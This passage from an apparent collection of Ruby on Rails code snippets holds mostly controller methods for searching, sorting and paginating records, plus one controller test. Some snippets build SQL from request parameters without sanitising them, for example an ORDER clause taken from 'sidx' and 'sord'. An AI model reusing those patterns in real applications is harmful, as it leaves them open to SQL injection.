params[:c], params[:d]) if [\"title_en\", \"title_fa\"].include?params[:c]\n\n #cache the current search set in a session variable\n session[:current_items] = @items.map { |i| i.id }\n session[:items_sort_field] = params[:c]\n session[:items_direction] = params[:d]\n session[:items_order] = @order\n\n @items_full_set = @items\n @items = @items.paginate :per_page => @per_page, :page => @page, :order => @order\n\n #cache the current search set in a session variable\n session[:admin_items_index_url] = request.fullpath\n\n respond_to do |format|\n format.html # index.html.erb\n format.csv do\n csv_string = make_custom_csv(@items_full_set)\n # send it to the browsah\n send_data csv_string,\n :type => 'text/csv; charset=utf-8; header=present',\n :disposition => \"attachment; filename=items.csv\"\n end\n format.xml { render :xml => @items_full_set }\n end\n end",
"def index\n results = @search.result(distinct: true)\n if params[:customer_id]\n results = results.where(customer_id: params[:customer_id])\n end\n results = results.tagged_with(params[:tags].split(/\\s*,\\s*/)) if params[:tags].present?\n results = results.includes :series\n results.paginate(page: params[:page], per_page: 20)\n\n set_listing results.paginate(page: params[:page], per_page: 20)\n\n end",
"def index\n# @entries = Entry.order('lower(de)')\n @q = Entry.order('lower(de)').ransack(params[:q])\n @entries = @q.result(distinct: true)\n end",
"def resultset; end",
"def index\n # @backend_users = User.all\n @search = User.order(created_at: :desc).search(params[:q])\n @backend_users = @search.result(:distinct => true)\n @backend_users = @backend_users.page(params[:page])\n end",
"def results\n @results ||= begin\n _dataset = filtered_dataset.limit(per_page).offset(start)\n\n if sort_by\n options = self.class.sortable_attribute_options(sort_by.to_s)\n order =\n if sort_order == \"DESC\"\n Sequel.desc(sort_by.to_sym, options)\n else\n Sequel.asc(sort_by.to_sym, options)\n end\n _dataset = _dataset.order(order)\n end\n\n _dataset.all\n end\n end",
"def query_all(args = {})\n query(args.merge(select: \"DISTINCT #{model.table_name}.*\"))\n end",
"def index\n @search = Article.search(params[:q])\n @articles = params[:distinct].to_i.zero? ? @search.result : @search.result(distinct: true)\n\n respond_with @articles\n end",
"def index\n @q = Candidato.paginate(page: params[:page]).search(params[:q])\n @candidatos = @q.result(:distinct => true)\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @candidatos }\n end\n end",
"def process_subquery_grid(opts = {})\n klass = opts[:klass] || nil\n column_defs = opts[:column_defs] || nil\n q = opts[:q] || nil\n page = opts[:page] || DEFAULT_PAGE\n per_page = opts[:per_page] || DEFAULT_PER_PAGE\n sort_info = opts[:sort_info] || DEFAULT_SORT_INFO\n field_lookup = opts[:field_lookup] || {}\n inner_join_query = opts[:inner_join_query] || nil\n inner_where_query = opts[:inner_where_query] || nil\n inner_group_query = opts[:inner_group_query] || nil\n\n # Enforce default values\n page ||= DEFAULT_PAGE\n per_page ||= DEFAULT_PER_PAGE\n sort_info ||= DEFAULT_SORT_INFO\n\n # Parse parameters into correct format\n column_defs = parse_params(column_defs)\n page = page.to_i\n per_page = per_page.to_i\n sort_info = parse_params(sort_info)\n\n # Check for client errors\n raise \"Invalid per_page parameter. Valid values are #{VALID_PER_PAGES}\" unless (VALID_PER_PAGES).include? per_page\n sort_info ||= {}\n\n # inner query\n inner_select_query = process_select(klass, column_defs, field_lookup)\n inner_select_query += \", #{klass.table_name}.#{inner_group_query} AS #{inner_group_query}\" unless inner_group_query.blank?\n inner_query = %{\n SELECT\n #{inner_select_query}\n FROM\n #{klass.table_name}\n }\n inner_query += \" #{inner_join_query}\" unless inner_join_query.blank?\n inner_query += \" WHERE #{inner_where_query}\" unless inner_where_query.blank?\n inner_query += \" GROUP BY #{inner_group_query}\" unless inner_group_query.blank?\n\n # outer query\n outer_query = %{\n SELECT *\n FROM\n (#{inner_query}) AS internal\n }\n\n # filter & order\n filtered_query = outer_query\n where_query = process_where(column_defs, q, field_lookup, true)\n filtered_query += \" WHERE #{where_query}\" unless where_query.blank?\n order_query = process_order(sort_info, field_lookup)\n filtered_query += \" ORDER BY #{order_query}\" unless order_query.blank?\n\n # pagination\n objects = klass.paginate_by_sql(filtered_query, page: page, per_page: per_page)\n\n objects\n end",
"def query_without_paging_sorting\n query = @initial_query.dup\n\n # restrict to select columns\n query = query_projection(query)\n\n #filter\n query_filter(query)\n end",
"def index\n # @entries = Entry.all\n @search.sorts = ['term desc', 'created_at desc'] if @search.sorts.empty?\n @search_term = params[:q]\n @entries = @search\n .result(distinct: true)\n .includes(:definitions)\n .page(params[:page])\n .per(params[:per_page])\n\n\n 1\n end",
"def index\n\n @publications = Publication.all.includes(:region, :commune, :publication_attachments) #Bulllet\n @publications = @publications.by_title(params[:search_title]) if params[:search_title].present?\n @publications = @publications.by_type(params[:search_type]) if params[:search_type].present?\n @publications = @publications.by_address(params[:search_address]) if params[:search_address].present?\n @publications = @publications.by_region(params[:search_region]) if params[:search_region].present?\n @publications = @publications.by_commune(params[:search_commune]) if params[:search_commune].present?\n @publications = @publications.by_address2(params[:search_address2]) if params[:search_address2].present?\n @publications = @publications.by_region2(params[:search_region2]) if params[:search_region2].present?\n @publications = @publications.by_commune2(params[:search_commune2]) if params[:search_commune2].present?\n @publications = @publications.by_width_min(params[:width_min]) if params[:width_min].present?\n @publications = @publications.by_width_max(params[:width_max]) if params[:width_max].present?\n @publications = @publications.by_length_min(params[:length_min]) if params[:length_min].present?\n @publications = @publications.by_length_max(params[:length_max]) if params[:length_max].present?\n @publications = @publications.by_height_min(params[:height_min]) if params[:height_min].present?\n @publications = @publications.by_height_max(params[:height_max]) if params[:height_max].present?\n @publications = @publications.by_latitude_min(params[:latitude_min]) if params[:latitude_min].present?\n @publications = @publications.by_latitude_max(params[:latitude_max]) if params[:latitude_max].present?\n @publications = @publications.by_longitude_min(params[:longitude_min]) if params[:longitude_min].present?\n @publications = @publications.by_longitude_max(params[:longitude_max]) if params[:longitude_max].present?\n end",
"def search\n @core_search.joins(:name_status)\n .select('max(name.id) id')\n .select('max(name.simple_name) simple_name')\n .select('max(name.full_name) full_name')\n .select('max(name.full_name_html) full_name_html')\n .select('tree_element.excluded')\n .select('max(name_status.id) name_status_id')\n .select('max(name_status.name) name_status_name_')\n .select('instance_type.misapplied')\n .select('instance_type.pro_parte')\n .select('max(names_instance.full_name) cross_referenced_full_name')\n .select('null cross_reference_misapplication_details')\n .select('max(names_instance.id) cross_referenced_full_name_id')\n .select('max(instance.id) instance_id')\n .select('max(citer_instances_instance.id) citers_instance_id')\n .select('max(tree_version_element.name_path) name_path')\n .select('null profile')\n .select('null synonyms')\n .select('true cross_reference')\n .select('max(names_instance.full_name_html) cross_ref_full_name_html')\n .select('instance_type.doubtful')\n .select('max(reference.citation) reference_citation')\n .group(main_group_by_columns)\n .limit(@parser.limit)\n .offset(@parser.offset)\n .order(' full_name ')\n end",
"def test_get_all_with_pagination\n # CASE 01: Mention of start_index and max_results\n # CASE 02: Mention of Order by with direction\n # CASE 03: Mention of Order by without direction\n # CASE 04: Mention a condition also\n # CASE 05: Getting only details of an entity\n \n user = User.find_by_id(@db1_admin_user_id)\n \n parent_resource = :entity_id\n parent_id = 100\n start_index = 10\n max_results = 10\n order_by = 'name'\n direction = 'DESC'\n table_name = 'instances'\n conditions = 'database_id=6'\n total_records = 0\n conditions = 'id=50'\n \n start_index = 0\n max_results = 1\n conditions = \"entity_id=#{parent_id}\"\n total_records = Instance.count_by_sql \"SELECT COUNT(*) FROM #{table_name} WHERE #{conditions}\"\n #########################################################\n # CASE 01\n # Mention of start_index and max_results\n #########################################################\n get :index, {\n parent_resource => parent_id,\n :format => 'json', \n :start_index => start_index, \n :max_results => max_results},\n {'user' => user}\n \n #assert_equal '', @response.body\n assert_response 200\n result = @response.body\n\n result = JSON.parse(result)\n\n assert_equal max_results, result['resources'].length\n assert_equal total_records, result['total_resources'].to_i\n \n \n order_by = 'name'\n direction = 'desc'\n start_index = 0\n max_results = 10\n #########################################################\n # CASE 02\n # Mention of order by with direction\n #########################################################\n get :index, {\n parent_resource => parent_id,\n :format => 'json', \n :start_index => start_index, \n :max_results => max_results,\n :order_by => order_by,\n :direction => direction\n },\n {'user' => user}\n \n #assert_equal '', @response.body\n assert_response 200\n result = @response.body\n\n result = JSON.parse(result)\n\n assert_equal 2, result['resources'].length\n assert_equal 'desc', result['direction']\n #assert_equal 201, result['resources'][0]['url'].chomp('.json')[/\\d+$/].to_i\n \n #########################################################\n # CASE 03\n # Mention of order by without direction\n #########################################################\n get :index, {\n parent_resource => parent_id,\n :format => 'json', \n :start_index => start_index, \n :max_results => max_results,\n :order_by => order_by,\n #:direction => direction\n },\n {'user' => user}\n \n #assert_equal '', @response.body\n assert_response 200\n result = @response.body\n\n result = JSON.parse(result)\n\n assert_equal 2, result['resources'].length\n assert_equal 'asc', result['direction']\n #assert_equal 200, result['resources'][0]['url'].chomp('.json')[/\\d+$/].to_i\n \n# FIXME: Following two tests always fail either in isolation or\n# in a complete execution of the tests due to disabling transactional fixtuers \n# start_index = 0\n# max_results = 10\n# order_by = 'name'\n# conditions = \"category='Fiction'\"\n# #########################################################\n# # CASE 04\n# # Mention of order by specifying condition\n# #########################################################\n# get :index, {\n# parent_resource => parent_id,\n# :format => 'json', \n# :start_index => start_index, \n# :max_results => max_results,\n# :order_by => order_by,\n# :conditions => conditions\n# },\n# {'user' => user}\n# #assert_equal '', @response.body\n# assert_response 200\n# result = @response.body\n# result = JSON.parse result\n# assert_equal 1, result['resources'].length\n# assert_equal 'asc', result['direction']\n# #assert_equal 201, result['resources'][0]['url'].chomp('.json')[/\\d+$/].to_i\n# \n# conditions = \"category='Computer Science' AND name='Compiler, Principles, Tools and Techniques'\"\n# #########################################################\n# # CASE 05\n# # Mention of compound conditions\n# #########################################################\n# get :index, {\n# parent_resource => parent_id,\n# :format => 'json', \n# :start_index => start_index, \n# :max_results => max_results,\n# :order_by => order_by,\n# :conditions => conditions\n# },\n# {'user' => user}\n# assert_equal '', @response.body\n# assert_response 200\n# result = @response.body\n# result = JSON.parse result\n# assert_equal 1, result['resources'].length\n# assert_equal 'asc', result['direction']\n# assert_equal 200, result['resources'][0]['url'].chomp('.json')[/\\d+$/].to_i\n \n \n end",
"def index_dm\n # http://stackoverflow.com/questions/12429429/datamapper-sorting-results-through-association\n #startime = Time.at 0\n #endtime = DateTime.now\n #range = (startime..endtime)\n # ps = Package.all(:order => [DataMapper::Query::Direction.new(Event.properties[:timestamp])], :links =>[:events])\n # @packages = ps.paginate(page: params[:page]) \n # @packages= Package.all(Package.events.timestamp => range, :fields => [ Package.events.timestamp], :unique => true, :order => [ Package.events.timestamp.desc ]).paginate(page: params[:page])\n # @packages = Package.ordered_by_timestamp(:desc).all.paginate(page: params[:page]) \n # @packages = Package.find_by_sql(\"SELECT p.id, e.timestamp from packages as p, events as e where p.id = e.package_id order by e.timestamp \")\n sort = DataMapper::Query::Operator.new(sort_column, sort_direction)\n if (params[:id_search] && !params[:id_search].empty?)\n #ps = Sip.all(:name.like => params[:id_search]).packages.events.all(:order => [sort]).packages | \n ps = Package.all(:id.like => params[:id_search], :order => [sort])\n @packages = ps#.paginate(page: params[:page])\n else\n # filter on activity\n names = \n case params[:activity_search]\n when 'submitted'\n \"submit\"\n when 'rejected'\n [\"reject\",\"daitss v.1 reject\"] \n when 'archived'\n \"ingest finished\"\n when 'disseminated'\n \"disseminate finished\"\n when 'error'\n [\"ingest snafu\", \"disseminate snafu\", \"refresh snafus\"]\n when 'withdrawn'\n \"withdraw finished\"\n else\n ['submit', \"reject\", \"ingest finished\", \"disseminate finished\", \"ingest snafu\", \"disseminate snafu\", \"withdraw finished\", \"daitss v.1 provenance\"]\n end\n \n # filter on date range\n start_date = if params[:start_time_search] and !params[:start_time_search].strip.empty?\n DateTime.strptime(params[:start_time_search], \"%Y-%m-%d\")\n else\n Time.at 0\n end\n \n end_date = if params[:end_time_search] and !params[:end_time_search].strip.empty?\n DateTime.strptime(params[:end_time_search], \"%Y-%m-%d\")\n else\n DateTime.now\n end\n \n end_date += 1\n range = (start_date..end_date)\n \n # lookup account if passed in\n if (params[:account] && params[:account][\"account_id\"])\n account = Account.get(params[:account][\"account_id\"])\n end\n \n # lookup project if passed in\n if params[:project] && params[:project] [\"project_id\"]\n # account and project specified\n project = account.projects.first(:id => params[:project][\"project_id\"]) if account\n end\n \n if account \n if (project)\n # account and project specified\n ps = project.packages.events.all(:timestamp => range, :name => names, :order => [ :timestamp.desc ]).packages \n else\n # account but not project specified\n ps = account.projects.packages.events.all(:timestamp => range, :name => names, :order => [ :timestamp.desc ] ).packages \n end\n else \n # neither account nor project specified\n ps = Event.all(:timestamp => range, :name => names, :order => [ :timestamp.desc ]).packages \n end\n \n # filter on batches\n batch = Batch.get(params[:batch_search])\n if batch \n ps = ps.find_all { |p| p.batches.include? batch } \n end\n @packages = ps.paginate(page: params[:page])\n end\n end",
"def index\n #@samplings = Sampling.all\n @title = \"List of samplings\"\n\n #samplings = Sampling.find(:all, :joins=> [:sampling_equipments, :partner, :sampling_site]) do\n #samplings = Sampling.find(:all, :joins=> [:partner, :sampling_site]) do\n # if params[:_search] == \"true\"\n # volume =~ \"%#{params[:volume]}%\" if params[:volume].present?\n # code =~ \"%#{params[:code]}%\" if params[:code].present?\n # sampling_site.name =~ \"%#{params[:site_name]}%\" if params[:site_name].present?\n # sampling_site.code =~ \"%#{params[:site_name]}%\" if params[:site_name].present?\n # partner.code =~ \"%#{params[:partner_name]}%\" if params[:partner_name].present?\n # #KAPPAO because it done an AND operator between ID and CODE\n # #partner.id =~ \"%#{params[:partner_name]}%\" if params[:partner_name].present?\n # sampling_equipment.name =~ \"%#{params[:sampling_equipment_name]}%\" if params[:sampling_equipment_name].present?\n # end\n #paginate :page => params[:page], :per_page => params[:rows] \n # if params[:sidx] == \"site_name\"\n # order_by \"sampling_sites.name #{params[:sord]}, sampling_sites.code #{params[:sord]}\"\n #\n # elsif params[:sidx] == \"partner_name\"\n # order_by \"partners.code #{params[:sord]}\"\n # elsif params[:sidx] == \"code\"\n # order_by \"samplings.code #{params[:sord]}\"\n # elsif params[:sidx] == \"sampling_equipment_name\"\n # order_by \"sampling_equipments.name #{params[:sord]}\"\n # else\n # order_by \"#{params[:sidx]} #{params[:sord]}\"\n # end\n #end\n\n #respond_to do |format|\n # format.html # index.html.erbs directly,\n # #format.xml { render :xml => @samplings }\n # format.json { render :json => samplings.to_jqgrid_json(\n # [:id, \"act\",:code,:site_name,:volume,\"partner_name\", \"sampling_equipment_name\",\"edit\"],\n # params[:page], params[:rows], samplings.total_entries) }\t\t\t\n #end\n\n\n index_columns ||= [:id, :act,:code,:site_name,:volume, :partner_name,:sampling_equipment_name,:edit]\n current_page = params[:page] ? params[:page].to_i : 1\n rows_per_page = params[:rows] ? params[:rows].to_i : 10\n conditions={:page => current_page, :per_page => rows_per_page}\n conditions[:order] = params[\"sidx\"] + \" \" + params[\"sord\"] unless (params[:sidx].blank? || params[:sord].blank?)\n \n if params[:_search] == \"true\"\n conditions[:conditions]=filter_by_conditions(index_columns)\n end\n \n #@fs = FilterSample.all(:conditions => ['sampling_id = ?', @sampling.id ])\n @samplings=Sampling.paginate(conditions)\n total_entries=@samplings.total_entries\n \n respond_with(@samplings) do |format|\n format.json { render :json => @samplings.to_jqgrid_json(index_columns, current_page, rows_per_page, total_entries)} \n end\n end",
"def exercise3\n @content = ActiveRecord::Base.connection.execute(\"\n SELECT\n gr.name as group,\n u.name as name,\n SUM(m.mapviews) as views,\n CONCAT(CAST(ROUND((SUM(m.mapviews)*100)/SUM(SUM(m.mapviews)) OVER (PARTITION BY gr.name),2) as text), '%') as percent_of_group_views\n FROM (((users as u\n INNER JOIN groups_users as gu ON u.id=gu.user_id)\n INNER JOIN groups as gr ON gr.id = gu.group_id)\n INNER JOIN maps as m ON m.user_id = u.id)\n GROUP BY (gr.name, u.name)\n ORDER BY gr.name ASC, percent_of_group_views DESC;\");\n\n @results3 = []\n\n index = 0\n @content.each do |r|\n @results3[index] = Result3.new r\n index = index + 1;\n end\n\n return @results3\n end",
"def index\n @q = Author.search(params[:q])\n @authors = @q.result(distinct: true).paginate(:page => params[:page]).order('last_name ASC')\n end",
"def reify_results(ids)\n results = []\n \n ids_hash = {}\n ids.each do |class_name, id|\n (ids_hash[class_name] ||= []) << id\n end\n \n ids.map {|ary| ary.first}.uniq.each do |class_name|\n klass = class_name.constantize\n \n finder = (\n Ultrasphinx::Search.client_options['finder_methods'].detect do |method_name| \n klass.respond_to? method_name\n end or\n # XXX This default is kind of buried, but I'm not sure why you would need it to be \n # configurable, since you can use ['finder_methods'].\n \"find_all_by_#{klass.primary_key}\"\n )\n\n records = klass.send(finder, ids_hash[class_name])\n \n unless Ultrasphinx::Search.client_options['ignore_missing_records']\n if records.size != ids_hash[class_name].size\n missed_ids = ids_hash[class_name] - records.map(&:id)\n msg = if missed_ids.size == 1\n \"Couldn't find #{class_name} with ID=#{missed_ids.first}\"\n else\n \"Couldn't find #{class_name.pluralize} with IDs: #{missed_ids.join(',')} (found #{records.size} results, but was looking for #{ids_hash[class_name].size})\"\n end\n raise ActiveRecord::RecordNotFound, msg\n end\n end\n \n records.each do |record|\n results[ids.index([class_name, record.id])] = record\n end\n end\n \n # Add an accessor for global search rank for each record, if requested\n if self.class.client_options['with_global_rank']\n # XXX Nobody uses this\n results.each_with_index do |result, index|\n if result\n global_index = per_page * (current_page - 1) + index\n result.instance_variable_get('@attributes')['result_index'] = global_index\n end\n end\n end\n\n # Add an accessor for distance, if requested\n if self.options['location']['lat'] and self.options['location']['long']\n results.each_with_index do |result, index|\n if result\n distance = (response[:matches][index][:attributes]['@geodist'] or INFINITY)\n result.instance_variable_get('@attributes')['distance'] = distance\n end\n end\n end\n \n results.compact!\n \n if ids.size - results.size > Ultrasphinx::Search.client_options['max_missing_records']\n # Never reached if Ultrasphinx::Search.client_options['ignore_missing_records'] is false due to raise\n raise ConfigurationError, \"Too many results for this query returned ActiveRecord::RecordNotFound. The index is probably out of date\" \n end\n \n results \n end",
"def index\n \n\n @q = current_user.organization.my_threads.search(params[:q])\n if params[:sel]\n \t@my_threads = @q.result(:distinct => true).includes(:thread_comments).order('thread_comments.updated_at DESC').page(params[:page]).per(params[:sel]) \n \t@chosen = params[:sel] \n else\n \t@my_threads = @q.result(:distinct => true).includes(:thread_comments).order('thread_comments.updated_at DESC').page(params[:page]).per(50) \n\t@chosen = 50\n end \n\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @my_threads }\n end\n end",
"def search_results(all_pages)\n formatted_list = []\n all_pages.each do |show_hash|\n formatted_list << \"id. #{show_hash[\"id\"]} - #{show_hash[\"name\"]}\"\n end\n if formatted_list.count != 1\n self.print_search_results(formatted_list)\n else\n fetch_show_by_id(all_pages[0][\"id\"].to_s)\n end\nend",
"def index\n @submissions = Field.find_by_sql(\"SELECT DISTINCT ON (unique_id) unique_id, form_id , updated_at FROM Fields WHERE user_id= #{current_user.id}\")\n end",
"def index\n my_tenant_id = (current_user.role == 'admin' ? current_user.tenant_id : nil)\n @all_stats = Stats.new\n @seven_day_stats = Stats.new(tenant_id: my_tenant_id, since: (Time.new - 7.days))\n @resources = build_table_query\n # If no records were found and a search parameter was specified, requery with\n # a ful text search to find partial word matches\n @resources = build_table_query(true) if @resources.empty? && params[:q].present? && params[:q].length > 4\n @publications = InternalDatum.where(data_type: 'publicationName').order(:value).pluck(:value).uniq\n respond_to do |format|\n format.html\n format.csv\n end\n end",
"def indexPhotographers\n @q = Vendor.where(entry:'Photographer').ransack(params[:q])\n\n @per_page = params[:per_page] || Vendor.per_page || 20\n @vendors = @q.result(:distinct=>true).paginate( :per_page => @per_page, :page => params[:page])\n if @vendors.size.zero?\n flash[:notice] = \"No Matches Found\"\n end\n end",
"def index \n @q = Car.ransack(params[:q])\n if @q.result.blank?\n redirect_to :back, alert: \"Sorry, No Results Found!\"\n else\n @cars = @q.result(distinct: true).where(:published => true).paginate(:page => params[:page], :per_page => 8).order('created_at DESC')\n end\n end",
"def index\n# @events = Event.all\n\n @q = Event.ransack(params[:q])\n @events = @q.result(distinct: true).page(params[:page]).per(3)\n\n \n end",
"def search_query\n query = @grouping_class.new(sanitized_attributes, params)\n data = query.run\n @search_data = Rails.cache.fetch(['search_data', params], expires_in: 1.week) do\n query.build_hash(data, params)\n end\n @filtered_data = query.filter(@search_data, params)\n render :json => Kaminari.paginate_array(@filtered_data).page(params[:page]).per(params[:per_page]),\n :meta => metadata(@filtered_data, params)\n end",
"def index\n @products = Product.all.page(params[:page]).per(12)\n # .result(distinct: true)\n\n if params[:q].present?\n # 検索フォームからアクセスした時の処理\n @serch = Product.ransack(params[:q])\n @products = @serch.result(distinct: true).page(params[:page]).per(12)\n else\n # 検索フォーム以外からアクセスした時の処理\n params[:q] = { sorts: 'id desc' }\n @serch = Product.ransack(params[:sorts])\n @products = Product.all.page(params[:page]).per(12)\n end\n end",
"def handle_pagination(query, ts_params, result)\n # Tablesorter submits row count or simply 'all'. If user requests more rows\n # than available do nothing.\n return query if (ts_params[:size] == 'all') || (ts_params[:size].to_i >= result[:total_rows])\n\n query.limit(ts_params[:size].to_i).offset(ts_params[:size].to_i * ts_params[:page].to_i)\n end",
"def index\n @search = search_params\n @results = InstructorInfo.order(\"RANDOM()\").limit(12)\n @tutor_reviews = Review.last(12).reverse\n unless @search[:min_rating].empty?\n @results = @results.where(\"avg_rating >= ?\", @search[:min_rating])\n end\n unless @search[:join_at].empty?\n if @search[:join_at] == \"半年内\"\n @results = @results.where(created_at: 6.month.ago..Date.today())\n elsif @search[:join_at] == \"半年到一年\"\n @results = @results.where(created_at: 1.year.ago..6.month.ago)\n elsif @search[:join_at] == \"一年以上\"\n @results = @results.where('created_at < ?', 1.year.ago)\n end\n end\n unless @search[:price_range] == '0,1000'\n min, max = @search[:price_range].split(',')\n @results = @results.where(price_base: min..max)\n end\n unless @search[:service].empty?\n or_results = nil\n for service in @search[:service]\n if service == \"早期咨询\"\n tmp = @results.where(is_early_consult: true)\n elsif service == \"头脑风暴\"\n tmp = @results.where(is_brainstorm_consult: true)\n elsif service == \"文书改写\"\n tmp = @results.where(is_essay_consult: true)\n elsif service == \"签证咨询\"\n tmp = @results.where(is_visa_consult: true)\n end\n or_results = or_results.nil? ? tmp : or_results.or(tmp)\n end\n @results = or_results\n end\n unless @search[:available_time].empty?\n end\n end",
"def updateGoogleSearchResults\n\n puts \"Updating Google Search Results\"\n\n SITE_CONFIG.each do |site, opts|\n\n Product.where(site_name: site).distinct(:sku).each do |sku|\n\n puts \"Grabbing Results for #{site.humanize.capitalize}:#{sku}\"\n\n getGoogleSearchResults(sku, site)\n\n end\n\n end\n\nend",
"def index\n #@maker_masters = MakerMaster.all\n\t\n\t@q = MakerMaster.ransack(params[:q]) \n @maker_masters = @q.result(distinct: true)\n @maker_masters = @maker_masters.page(params[:page])\n\n end",
"def index\n @filters = Filter.all\n @cars = Car.standard.has_photos.owner_has_login.includes(:user, :photos, :trim, model: :make)\n filter = Filter.find_by(id: params[:filter])\n if params[:search].present? || (params[:lat].present? && params[:lng].present?)\n @cars = @cars.simple_search(params[:search], params[:lat], params[:lng], params[:radius])\n @user_count = User.simple_search(params[:search], params[:lat], params[:lng], params[:radius]).count\n elsif filter\n @cars = filter.search\n end\n\n per_page = 12\n\n # Show random results on first page, order by date for page 2+\n if params[:page].to_s.to_i > 1 || params[:search].present? || (params[:lat].present? && params[:lng].present?)\n @cars = @cars.order(created_at: :desc)\n start_at = params[:page].to_i\n start_at = 1 if start_at.zero?\n @for_pagination = @cars.page(start_at).per(per_page)\n # Start at page 1 when user is at page 2 (since page 1 is really a random set)\n start_at -= 1 if params[:search].blank?\n @cars = @cars.page(start_at).per(per_page)\n else\n @for_pagination = @cars.page(params[:page]).per(per_page)\n @cars = @cars.where(id: @cars.pluck(:id).sample(per_page))\n end\n end",
"def index\n @q = Listing.all.where('id NOT IN (SELECT DISTINCT(listing_id) FROM purchases)').ransack(params[:q])\n @listings = @q.result(distinct: true).page(params[:page]).per(30)\n end",
"def index\n # @things = Thing.all\n # indexarr = params[:indices]\n # # indexarr = [60, 59, 62, 61, 70, 94, 72, 71, 85, 32, 16, 6, 27, 38, 14, 90, 48, 39, 74, 66]\n # # mi = indexarr.map.with_index(0).to_a\n \n # res = Thing.joins(:model_version_images).where('model_version_images.index' => indexarr).group(\"things.id\")\n\n # mindex = indexarr.each_with_index.map {|m, i| \"(#{m},#{i})\" }.join(\",\")\n # # r = Thing.select(\"things.*, MIN(x.ordering) as imgorder\").joins(:model_version_images).joins(\"INNER JOIN ( values #{mindex}) as x (index, ordering) ON model_version_images.index = x.index\").group(\"things.id\").order(\"imgorder\").includes(:model_version_images).page(1).per(2)\n # r = Thing.select(\"things.*, MIN(x.ordering) as imgorder\").joins(\"model_version_images as images ON things.id = images.thing_id\").joins(:model_version_images).joins(\"INNER JOIN ( values #{mindex}) as x (index, ordering) ON model_version_images.index = x.index\").group(\"things.id\").order(\"imgorder\").includes(:model_version_images)\n # res = Thing.joins(:model_version_images).joins(\"INNER JOIN ( values #{mindex}) as x (index, ordering) ON model_version_images.index = x.index\").group(\"things.id\")\n end",
"def index\n @search = Backend::Category.order(created_at: :desc).search(params[:q])\n @backend_categories = @search.result(:distinct => true)\n @backend_categories = @backend_categories.page(params[:page])\n # @search = Supervisor.search(params[:q])\n # @supervisors = @search.result(:distinct => true)\n end",
"def index\n @q = Recepcion.search(params[:q])\n @recepcions = @q.result(:distinct => true)\n end",
"def index\n @photographs = Photograph.all\n\n @search = Photograph.ransack(params[:q])\n @photographs = @search.result(distinct: true)\n end",
"def list_researchers\n catid = params[:catid] || ''\n\n lyear = params[:lyear] || '1900'\n hyear = params[:hyear] || '9999'\n spost = params[:spost] || '0'\n npost = params[:npost] || '-1'\n if catid.blank?\n render nothing: true\n return\n end\n category_obj = Category.find_by_id(catid.to_i)\n if category_obj.blank?\n render nothing: true\n return\n end\n\n svepid = category_obj.svepid\n\n sql_str = \"SELECT p.id, p.last_name, p.first_name, p.year_of_birth, i.value, count(p.id) c, row_number() OVER () AS rnum\n FROM people p\n JOIN identifiers i ON i.person_id = p.id\n JOIN sources s ON s.id = i.source_id\n JOIN people2publications p2p ON p2p.person_id = p.id\n JOIN publication_versions pv ON pv.id = p2p.publication_version_id\n JOIN publications publ ON publ.current_version_id = pv.id\n JOIN categories2publications c2p ON c2p.publication_version_id = pv.id\n JOIN categories c ON c.id = c2p.category_id\n WHERE s.name = 'xkonto'\n AND publ.deleted_at IS NULL\n AND publ.published_at IS NOT NULL\n AND CAST(c.svepid AS text) LIKE ?\n AND pv.pubyear >= ?\n AND pv.pubyear <= ?\n GROUP BY p.id, p.last_name, p.first_name, p.year_of_birth, i.value\n HAVING count(p.id) > 1\n ORDER BY p.last_name, p.first_name\"\n\n person_list = Person.find_by_sql([sql_str, \"#{svepid}%\", lyear, hyear])\n if person_list.blank?\n render nothing: true\n return\n end\n person_list_sliced = (npost.to_i == -1) ? person_list[spost.to_i..-1] : person_list[spost.to_i, npost.to_i]\n if person_list_sliced.blank?\n render nothing: true\n return\n end\n\n total = person_list.length\n items = person_list_sliced.length\n\n builder = Nokogiri::XML::Builder.new do |xml|\n xml.send(:\"upl-records-researchers\") do\n xml.send(:\"header\") do\n xml.items items\n xml.total total\n end\n xml.send(:\"upl-researchers\") do\n person_list_sliced.each.with_index do |p, i|\n xml.send(:\"upl-researchers\", \"num\" => \"#{i + 1}\") do\n xml.rnum p.rnum\n xml.last p.last_name\n xml.first p.first_name\n xml.byear p.year_of_birth\n xml.external_user_id p.value\n xml.pubcount p.c\n end\n end\n end\n end\n end\n render xml: builder\n\n end",
"def fetch\n sort = 'created_at DESC'\n\n case params[:sort_by]\n when 'recent'\n sort = 'created_at DESC'\n else\n\n end\n\n q = '%' + params[:query].downcase + '%'\n\n groups = Group.where(\"LOWER(name) LIKE ? OR LOWER(identifier) LIKE ? OR lower(tags) LIKE ?\", q, q, q)\n .order(sort)\n\n paginate json: groups\n end",
"def execute\n perform_search(Group.all)\n .then(&method(:paginate))\n .then(&method(:sort))\n end",
"def indexHairdressers\n\n \n @q = Vendor.where(entry:'Hairdresser').ransack(params[:q])\n\n @per_page = params[:per_page] || Vendor.per_page || 20\n @vendors = @q.result(:distinct=>true).paginate( :per_page => @per_page, :page => params[:page])\n \n\n\n if @vendors.size.zero?\n flash[:notice] = \"No Matches Found\"\n end\n end",
"def index\n @publishers = Publisher.joins(:resource,:resource => :site).select(\n \"publishers.id as publisher_id, \n publishers.hostname as publisher_hostname,\n sites.name as site_name,resources.name as resource_name, \n publishers.ip as publisher_ip, publishers.token as publisher_token\").paginate( :page=>params[:page], :per_page => config.itemsPerPageHTML).orderByParms('publisher_hostname',params).search(params[:key],params[:search])\n respond_to do |format|\n format.html {}\n format.any(:xml,:json) {}\n end\n respond_to do |format|\n format.html # index.html.erb\n format.json { render :json => @publishers }\n format.xml { render :xml => @publishers }\n end\n end",
"def paginator=(_arg0); end",
"def index\n sort_field = params[\"sort_field\"] || :social_connection_index\n sort_order = params[\"sort_order\"] || :desc\n page = params[\"page\"] || 1\n limit = params[\"limit\"] || 10\n searchTerm = params[\"searchTerm\"] || \"\"\n\n limit = limit.to_i\n offset = (page.to_i - 1) * limit\n\n users = User.all.order(sort_field => sort_order, :id => \"desc\").\n where(User.arel_table[:name].matches(\"%#{searchTerm}%\"))\n\n total = users.count\n users = users.offset(offset).limit(limit)\n users = users.select(User.column_names - [\"created_at\", \"updated_at\"])\n\n response = {\n users: users,\n page: page,\n total: total,\n limit: limit\n }\n\n respond_to do |format|\n format.json { render :json => response }\n end\n end",
